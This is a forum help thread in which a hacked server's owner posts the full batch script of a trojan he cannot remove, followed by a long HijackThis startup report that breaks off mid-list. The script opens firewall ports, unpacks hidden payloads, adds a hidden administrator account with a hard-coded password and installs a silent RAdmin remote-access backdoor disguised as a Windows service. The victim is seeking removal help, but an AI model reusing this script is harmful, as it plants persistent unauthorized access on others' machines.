# Trojan/Virus - Can't Remove



## Gunny123 (Mar 29, 2006)

Hey,

My server was hacked a couple of days ago. I've cleaned it up pretty well for the most part. I've deleted certain files, registry settings, added firewall protection, upgraded to the latest service packs and hotfixes, ugpraded serv-u, installed avast virus scanner, and other tools from sysinternals.com

However, using this program called Security Task Manager is detecting 3 files with a risk rating of 92. At first I blew it off, but I've started looking into it more and more and it is a virus/trojan. I've performed several steps to try to clean it up, however, it's hidden from sysinternals.com process explorer, task manager, the registry settings to auto start it are hidden also, so I can't disable that. My virus scanner can't detect it either, and resident protection is running.

In security task manager, it shows the file is not found, so it can't delete or quarantine or kill the process.

I rebooted to see if I removed it succesfully, but I didn't. It has this nasty batch file where it will extract files needed, create an administrator user account, modify the windows firewall settings, setup radmin, and some other stuff. Like I said, I thought I had it but I rebooted and saw teh batch file there again, and my windows firewall settings modified.

I'm not to worried at this point becauseof my firewall restrictions, and I did a port scan and I'm not seeing the port for RAdmin open. I don't think I'm in harm, but I'd like to get rid of it regardless.

Any ideas?

Here is the batch file:

(Note, most files are not on the file system, unless they are hidden. I can't find the main zip file either. I could only find one file, and quarantined it.)

@echo off

netsh firewall set opmode mode=ENABLE exceptions=ENABLE profile=STANDARD
netsh firewall add portopening protocol = tcp port = 9450 name = WindowsUpdate
netsh firewall add portopening protocol = tcp port = 7205 name = SecurityCenter
netsh firewall add portopening protocol = tcp port = 3389 name = TerminalServices
netsh firewall add portopening protocol = tcp port = 7777 name = Certification
netsh firewall add portopening protocol = tcp port = 25931 name = MicrosoftProductUpdateService

if not exist %windir%\system32\ptrd.avm unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll ptrd.avm %windir%\system32\
ptrd.avm user HelpAssistant /active:yes
ptrd.avm user HelpAssistant b0ble54!b2
ptrd.avm user HelpAssistant b0ble54!b2 /add
ptrd.avm localgroup Administrators HelpAssistant /add

if not exist %windir%\system32\wbem\AdmDll.dll unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\AdmDll.dll %windir%\system32\
if not exist %windir%\system32\wbem\serv.exe unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\serv.exe %windir%\system32\
if not exist %windir%\system32\wbem\cliccp.cpl unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\cliccp.cpl %windir%\system32\

%windir%\system32\wbem\serv.exe install fuswci /n:"Fast User Switching" /b:%windir%\system32\wbem\mtsvc.exe /u:LocalSystem /s:AUTO /i:yes
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath=%windir%\system32\msengs.dll"
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=251c0000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=827E8E88A308053924CE0D66DF573F62
%windir%\system32\wbem\cliccp.cpl -Set REG_EXPAND_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\ImagePath=%windir%\system32\wbem\mtsvc.exe /service"
%windir%\system32\wbem\cliccp.cpl -Set REG_DWORD \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\FailureActions=00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,6e,00,64,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00"

if not exist %windir%\system32\wbem\bvsrv.dll unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\bvsrv.dll %windir%\system32\
if not exist %windir%\system32\wbem\bvsrv.ocx unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\bvsrv.ocx %windir%\system32\

if not exist %windir%\system32\rwinstall.exe goto EGG
:ret1
if not exist %windir%\system32\wbem\mtsvc.exe goto RAD
:ret2
if not exist %windir%\system32\wbem\fndpri.exe goto SER
:ret3
if not exist %windir%\system32\wbem\tmcfg.exe goto ROO
:ret4
goto END

:EGG
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll rwinstall.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll winsmp.dll %windir%\system32\
%windir%\system32\rwinstall.exe -run
goto ret1

:RAD
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\mtsvc.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\AdmDll.dll %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\serv.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\cliccp.cpl %windir%\system32\
%windir%\system32\wbem\serv.exe install fuswci /n:"Fast User Switching" /b:%windir%\system32\wbem\mtsvc.exe /u:LocalSystem /s:AUTO /i:yes
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server
%windir%\system32\wbem\cliccp.cpl -AddKey \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath=%windir%\system32\msengs.dll"
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled=00000000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=251c0000
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY \HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=827E8E88A308053924CE0D66DF573F62
%windir%\system32\wbem\cliccp.cpl -Set REG_EXPAND_SZ "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\ImagePath=%windir%\system32\wbem\mtsvc.exe /service"
%windir%\system32\wbem\cliccp.cpl -Set REG_DWORD \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fuswci\FailureActions=00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,6e,00,64,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00"
ptrd.avm start fuswci
goto ret2

:SER
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\fndpri.exe %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\wmsp.dll %windir%\system32\
unrar.exe x -o- -pq2b9H3Bl6I0 samclt.dll wbem\cliccp.cpl %windir%\system32\
%windir%\system32\wbem\fndpri.exe /i
%windir%\system32\wbem\cliccp.cpl -Set REG_BINARY "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wdsmda\FailureActions=00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,6e,00,64,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00"
ptrd.avm start wdsmda
goto ret3

:ROO
unrar.exe x -o+ -pq2b9H3Bl6I0 samclt.dll wbem\tmcfg.exe %windir%\system32\
"%windir%\system32\wbem\tmcfg.exe"
goto ret4

:END
exit


----------



## Gunny123 (Mar 29, 2006)

Hijack this:

StartupList report, 3/29/2006, 4:43:40 AM
StartupList version: 1.52.2
Started from : C:\Installed\HijackThis.EXE
Detected: Windows 2003 SP1 (WinNT 5.02.3790)
Detected: Internet Explorer v6.00 SP1 (6.00.3790.1830)
* Using default options
* Including empty and uninteresting sections
* Showing rarely important sections
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\msdtc.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
C:\Program Files\Simple DNS Plus\sdnsmain.exe
C:\Program Files\Serv-U\ServUDaemon.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Urchin\bin\urchind.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\WINDOWS\System32\svchost.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\explorer.exe
C:\Installed\HijackThis.exe

--------------------------------------------------

Listing of startup folders:

Shell folders Startup:
[C:\Documents and Settings\user\Start Menu\Programs\Startup]
*No files*

Shell folders AltStartup:
*Folder not found*

User shell folders Startup:
*Folder not found*

User shell folders AltStartup:
*Folder not found*

Shell folders Common Startup:
[C:\Documents and Settings\All Users\Start Menu\Programs\Startup]
*No files*

Shell folders Common AltStartup:
*Folder not found*

User shell folders Common Startup:
*Folder not found*

User shell folders Alternate Common Startup:
*Folder not found*

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,

[HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
*Registry value not found*

[HKCU\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Simple DNS Plus = C:\Program Files\Simple DNS Plus\sdnsplus.exe -s
avast! = C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .COM:
HKEY_CLASSES_ROOT\comfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .BAT:
HKEY_CLASSES_ROOT\batfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .PIF:
HKEY_CLASSES_ROOT\piffile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .SCR:
HKEY_CLASSES_ROOT\scrfile\shell\open\command

(Default) = "%1" /S

--------------------------------------------------

File association entry for .HTA:
HKEY_CLASSES_ROOT\htafile\shell\open\command

(Default) = C:\WINDOWS\system32\mshta.exe "%1" %*

--------------------------------------------------

File association entry for .TXT:
HKEY_CLASSES_ROOT\txtfile\shell\open\command

(Default) = %SystemRoot%\system32\NOTEPAD.EXE %1

--------------------------------------------------

Enumerating Active Setup stub paths:
HKLM\Software\Microsoft\Active Setup\Installed Components
(* = disabled by HKCU twin)

[>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP

[>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] *
StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

[{2C7339CF-2B09-4501-B3F3-F3508C9228ED}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

[{36BBA8D2-CA5C-4847-81CC-4F807DD86C91}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:IEUpdateUser urlmon.dll

[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install

[{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT

[{4b218e3e-bc98-4770-93d3-2731b9329278}] *
StubPath = %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection MarketplaceLinkInstall 896 %systemroot%\inf\ie.inf

[{6BF52A52-394A-11d3-B153-00C04F79FAA6}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp.inf,PerUserStub

[{6D69F546-C1AF-4049-AE9E-28627B91D3F5}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:IEUpdateAdmin urlmon.dll

[{7790769C-0471-11d2-AF11-00C04FA35D02}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install

[{89820200-ECBD-11cf-8B85-00AA005B4340}] *
StubPath = regsvr32.exe /s /n /i:U shell32.dll

[{89820200-ECBD-11cf-8B85-00AA005B4383}] *
StubPath = %SystemRoot%\system32\ie4uinit.exe

[{89B4C1CD-B018-4511-B0A1-5476DBF70820}] *
StubPath = C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install

[{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}] *
StubPath = %SystemRoot%\system32\rundll32.exe iesetup.dll,IEHardenAdmin

[{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}] *
StubPath = %SystemRoot%\system32\rundll32.exe iesetup.dll,IEHardenUser

--------------------------------------------------

Enumerating ICQ Agent Autostart apps:
HKCU\Software\Mirabilis\ICQ\Agent\Apps

*Registry key not found*

--------------------------------------------------

Load/Run keys from C:\WINDOWS\WIN.INI:

load=*INI section not found*
run=*INI section not found*

Load/Run keys from Registry:

HKLM\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKLM\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKLM\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKCU\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKCU\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\Windows: load=
HKCU\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=C:\WINDOWS\System32\logon.scr
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry key not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Checking for EXPLORER.EXE instances:

C:\WINDOWS\Explorer.exe: PRESENT!

C:\Explorer.exe: not present
C:\WINDOWS\Explorer\Explorer.exe: not present
C:\WINDOWS\System\Explorer.exe: not present
C:\WINDOWS\System32\Explorer.exe: not present
C:\WINDOWS\Command\Explorer.exe: not present
C:\WINDOWS\Fonts\Explorer.exe: not present

--------------------------------------------------

Checking for superhidden extensions:

.lnk: HIDDEN! (arrow overlay: yes)
.pif: HIDDEN! (arrow overlay: yes)
.exe: not hidden
.com: not hidden
.bat: not hidden
.hta: not hidden
.scr: not hidden
.shs: HIDDEN!
.shb: HIDDEN!
.vbs: not hidden
.vbe: not hidden
.wsh: not hidden
.scf: HIDDEN! (arrow overlay: NO!)
.url: HIDDEN! (arrow overlay: yes)
.js: not hidden
.jse: not hidden

--------------------------------------------------

Verifying REGEDIT.EXE integrity:

- Regedit.exe found in C:\WINDOWS
- .reg open command is normal (regedit.exe %1)
- Company name OK: 'Microsoft Corporation'
- Original filename OK: 'REGEDIT.EXE'
- File description: 'Registry Editor'

Registry check passed

--------------------------------------------------

Enumerating Browser Helper Objects:

*No BHO's found*

--------------------------------------------------

Enumerating Task Scheduler jobs:

*No jobs found*

--------------------------------------------------

Enumerating Download Program Files:

[Housecall ActiveX 6.5]
InProcServer32 = C:\WINDOWS\Downloaded Program Files\Housecall_ActiveX.dll
CODEBASE = http://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab

[Shockwave Flash Object]
InProcServer32 = C:\WINDOWS\system32\Macromed\Flash\Flash8a.ocx
CODEBASE = http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

--------------------------------------------------

Enumerating Winsock LSP files:

NameSpace #1: C:\WINDOWS\System32\mswsock.dll
NameSpace #2: C:\WINDOWS\System32\winrnr.dll
NameSpace #3: C:\WINDOWS\System32\mswsock.dll
Protocol #1: C:\WINDOWS\system32\mswsock.dll
Protocol #2: C:\WINDOWS\system32\mswsock.dll
Protocol #3: C:\WINDOWS\system32\mswsock.dll
Protocol #4: C:\WINDOWS\system32\mswsock.dll
Protocol #5: C:\WINDOWS\system32\mswsock.dll
Protocol #6: C:\WINDOWS\system32\mswsock.dll
Protocol #7: C:\WINDOWS\system32\mswsock.dll
Protocol #8: C:\WINDOWS\system32\mswsock.dll
Protocol #9: C:\WINDOWS\system32\mswsock.dll
Protocol #10: C:\WINDOWS\system32\mswsock.dll
Protocol #11: C:\WINDOWS\system32\mswsock.dll
Protocol #12: C:\WINDOWS\system32\mswsock.dll
Protocol #13: C:\WINDOWS\system32\mswsock.dll

--------------------------------------------------

Enumerating Windows NT/2000/XP services

Adaptec SCSI RAID Miniport Driver: system32\drivers\aac.sys (system)
Microsoft ACPI Driver: system32\DRIVERS\ACPI.sys (system)
Application Experience Lookup Service: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
AFD Networking Support Environment: \SystemRoot\System32\drivers\afd.sys (system)
Alerter: %SystemRoot%\system32\svchost.exe -k LocalService (disabled)
Application Layer Gateway Service: %SystemRoot%\System32\alg.exe (manual start)
Application Management: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
ASP.NET State Service: %SystemRoot%\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe (manual start)
avast! iAVS4 Control Service: "C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe" (autostart)
RAS Asynchronous Media Driver: system32\DRIVERS\asyncmac.sys (manual start)
Standard IDE/ESDI Hard Disk Controller: system32\DRIVERS\atapi.sys (system)
ati2mpad: system32\DRIVERS\ati2mpad.sys (manual start)
ATM ARP Client Protocol: system32\DRIVERS\atmarpc.sys (manual start)
Windows Audio: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Audio Stub Driver: system32\DRIVERS\audstub.sys (manual start)
avast! Antivirus: "C:\Program Files\Alwil Software\Avast4\aswServ.exe" (autostart)
avast! Mail Scanner: "C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (manual start)
avast! Web Scanner: "C:\Program Files\Alwil Software\Avast4\aswWebSv.exe" /service (manual start)
Backup Exec Remote Agent for Windows Servers: "C:\Program Files\VERITAS\Backup Exec\RANT\beremote.exe" (autostart)
Background Intelligent Transfer Service: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Computer Browser: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
CCDed: c:\webcc\ccded\ccded.exe (manual start)
CD-ROM Driver: system32\DRIVERS\cdrom.sys (system)
Indexing Service: %SystemRoot%\system32\cisvc.exe (disabled)
ClipBook: %SystemRoot%\system32\clipsrv.exe (disabled)
Cluster Disk Driver: system32\DRIVERS\ClusDisk.sys (disabled)
COM+ System Application: C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} (manual start)
CRC Disk Filter Driver: system32\DRIVERS\crcdisk.sys (system)
Cryptographic Services: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
MailMax 5.5 - DataMaxDB .NET: C:\Program Files\MailMax5\DataMaxDB.exe (autostart)
DCOM Server Process Launcher: %SystemRoot%\system32\svchost.exe -k DcomLaunch (autostart)
Distributed File System: %SystemRoot%\system32\Dfssvc.exe (autostart)
DfsDriver: system32\drivers\Dfs.sys (system)
DHCP Client: %SystemRoot%\system32\svchost.exe -k NetworkService (autostart)
Disk Driver: system32\DRIVERS\disk.sys (system)
Logical Disk Manager Administrative Service: %SystemRoot%\System32\dmadmin.exe /com (manual start)
dmboot: System32\drivers\dmboot.sys (disabled)
Logical Disk Manager Driver: System32\drivers\dmio.sys (system)
dmload: System32\drivers\dmload.sys (system)
Logical Disk Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
DNS Server: %SystemRoot%\System32\dns.exe (disabled)
DNS Client: %SystemRoot%\system32\svchost.exe -k NetworkService (autostart)
Intel(R) PRO/1000 Adapter Driver: system32\DRIVERS\e1000325.sys (manual start)
Error Reporting Service: %SystemRoot%\System32\svchost.exe -k WinErr (autostart)
Event Log: %SystemRoot%\system32\services.exe (autostart)
COM+ Event System: C:\WINDOWS\system32\svchost.exe -k netsvcs (autostart)
Floppy Disk Controller Driver: system32\DRIVERS\fdc.sys (manual start)
Floppy Disk Driver: system32\DRIVERS\flpydisk.sys (manual start)
FltMgr: system32\drivers\fltmgr.sys (system)
Volume Manager Driver: system32\DRIVERS\ftdisk.sys (system)
Generic Packet Classifier: system32\DRIVERS\msgpc.sys (manual start)
Help and Support: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
HID Input Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Microsoft HID Class Driver: system32\DRIVERS\hidusb.sys (manual start)
MailMax 5.5 - HouseKeeping: C:\Program Files\MailMax5\HouseKeep.exe (autostart)
HTTP: System32\Drivers\HTTP.sys (manual start)
HTTP SSL: C:\WINDOWS\system32\lsass.exe (autostart)
i8042 Keyboard and PS/2 Mouse Port Driver: system32\DRIVERS\i8042prt.sys (system)
IIS Admin Service: C:\WINDOWS\system32\inetsrv\inetinfo.exe (autostart)
CD-Burning Filter Driver: system32\DRIVERS\imapi.sys (system)
IMAPI CD-Burning COM Service: C:\WINDOWS\system32\imapi.exe (disabled)
MailMax 5.5 - Imap Service: C:\Program Files\MailMax5\IMAPMax.exe (autostart)
IntelIde: system32\DRIVERS\intelide.sys (system)
Intel Processor Driver: system32\DRIVERS\intelppm.sys (manual start)
IPv6 Windows Firewall Driver: system32\drivers\ip6fw.sys (manual start)
IP Traffic Filter Driver: system32\DRIVERS\ipfltdrv.sys (manual start)
IP in IP Tunnel Driver: system32\DRIVERS\ipinip.sys (manual start)
IP Network Address Translator: system32\DRIVERS\ipnat.sys (manual start)
IPSEC driver: system32\DRIVERS\ipsec.sys (system)
IR Enumerator Service: system32\DRIVERS\irenum.sys (manual start)
PnP ISA/EISA Bus Driver: system32\DRIVERS\isapnp.sys (system)
